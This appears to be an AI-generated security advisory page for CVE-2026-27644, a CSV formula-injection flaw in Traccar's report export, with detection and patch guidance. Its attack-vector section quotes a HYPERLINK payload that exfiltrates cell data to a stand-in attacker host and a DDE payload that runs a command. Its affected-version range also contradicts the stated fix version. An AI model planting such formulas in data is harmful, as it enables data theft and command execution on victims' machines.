Skip to main content
CVE Vulnerability Database
Vulnerability Database/CVE-2026-27644

CVE-2026-27644: Traccar GPS Tracking RCE Vulnerability

CVE-2026-27644 is a remote code execution flaw in Traccar GPS tracking system caused by CSV injection. Attackers can execute formulas in spreadsheets leading to command execution. Learn about technical details, affected versions, and patches.

Published:

CVE-2026-27644 Overview

CVE-2026-27644 is a CSV injection vulnerability affecting Traccar, an open source GPS tracking system. The flaw exists in versions 6.11.1 through 6.13.0 and resides in the CSV export functionality. The CsvExportProvider writes position data, including user-controlled device and computed attributes, to CSV output without escaping formula-triggering characters. An authenticated attacker can inject spreadsheet formulas through device fields. When a manager or administrator opens the exported CSV in spreadsheet software such as Microsoft Excel or LibreOffice Calc, the injected formulas execute. This can lead to command execution on the victim's workstation or exfiltration of cell data to an attacker-controlled host. The issue is tracked under [CWE-1236] and patched in version 6.13.0.

Critical Impact

Authenticated attackers can inject spreadsheet formulas into CSV exports, leading to command execution or data exfiltration when administrators open the exported reports.

Affected Products

  • Traccar versions 6.11.1 through 6.12.x
  • Traccar GPS tracking server CSV report export feature
  • Patched in Traccar version 6.13.0

Discovery Timeline

  • 2026-05-05 - CVE-2026-27644 published to NVD
  • 2026-05-07 - Last updated in NVD database

Technical Details for CVE-2026-27644

Vulnerability Analysis

The vulnerability is a CSV formula injection issue, classified under [CWE-1236] (Improper Neutralization of Formula Elements in a CSV File). Traccar collects telemetry data from GPS devices, including device names, attributes, and computed fields populated by users. The CSV export report serializes this data into comma-separated output for offline analysis. The export routine writes attribute values directly into the CSV without prefixing untrusted strings that begin with formula characters such as =, +, -, @, or tab characters.

When an administrator or fleet manager opens the resulting file in spreadsheet software, the application interprets cells beginning with these characters as formulas. Attackers leverage functions like HYPERLINK, WEBSERVICE, IMPORTXML, or dynamic data exchange (DDE) directives to coerce the spreadsheet into making outbound network requests or executing local commands.

Root Cause

The root cause is missing output sanitization in CsvExportProvider.java. The export logic iterates over position records and writes attribute values verbatim into CSV rows. The relevant code path can be reviewed in the GitHub CsvExportProvider source. The provider does not neutralize leading formula metacharacters before writing values, and it does not quote fields in a way that suppresses formula evaluation by spreadsheet clients.

Attack Vector

An attacker with low-privilege authenticated access registers or controls a tracked device and sets device names or attributes containing payloads such as =HYPERLINK("http://attacker/?d="&A1,"Click") or =cmd|'/c calc'!A1. When a higher-privileged user generates a CSV report covering that device and opens the file, the spreadsheet engine evaluates the payload. Exploitation requires user interaction, but administrators routinely open exported reports as part of fleet operations. Refer to GHSA-745r-9qgj-x7m7 for vendor analysis.

Detection Methods for CVE-2026-27644

Indicators of Compromise

  • Device names, identifiers, or attributes beginning with =, +, -, @, or tab characters in the Traccar database
  • Outbound DNS or HTTP requests originating from administrator workstations to unfamiliar hosts shortly after opening Traccar CSV reports
  • Spreadsheet processes (excel.exe, soffice.bin) spawning command interpreters such as cmd.exe or powershell.exe

Detection Strategies

  • Audit Traccar device and attribute tables for entries whose values start with formula trigger characters
  • Monitor process creation telemetry on management workstations for spreadsheet-to-shell process chains
  • Inspect web proxy and DNS logs for WEBSERVICE or HYPERLINK-style callbacks correlating with CSV report downloads

Monitoring Recommendations

  • Enable EDR process-tree logging on workstations used by Traccar managers and administrators
  • Alert on Office or LibreOffice processes initiating outbound network connections
  • Track Traccar API calls that update device names and attributes for suspicious payloads

How to Mitigate CVE-2026-27644

Immediate Actions Required

  • Upgrade Traccar to version 6.13.0 or later, which neutralizes formula characters in CSV output
  • Audit existing device records and attributes for malicious formula content and sanitize them before generating reports
  • Restrict CSV export privileges to accounts that require them

Patch Information

The vendor patched the issue in Traccar 6.13.0. The fix updates CsvExportProvider to escape leading formula characters when serializing values. Review the Traccar security advisory GHSA-745r-9qgj-x7m7 for upgrade details and commit references.

Workarounds

  • Configure spreadsheet clients to disable automatic formula evaluation and dynamic data exchange when opening external CSV files
  • Open Traccar CSV exports in plain-text editors or import them with explicit text-only column types
  • Apply input validation on device names and attributes at the application or reverse-proxy layer to reject leading =, +, -, and @ characters
bash
# Configuration example: validate device attributes before storage
# Reject payloads beginning with formula trigger characters
grep -E '^[=+\-@\t]' device_attributes.txt && echo "Potential CSV injection payload detected"

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the Most Advanced Cybersecurity Platform

See how the world’s most intelligent, autonomous cybersecurity platform can protect your organization today and into the future.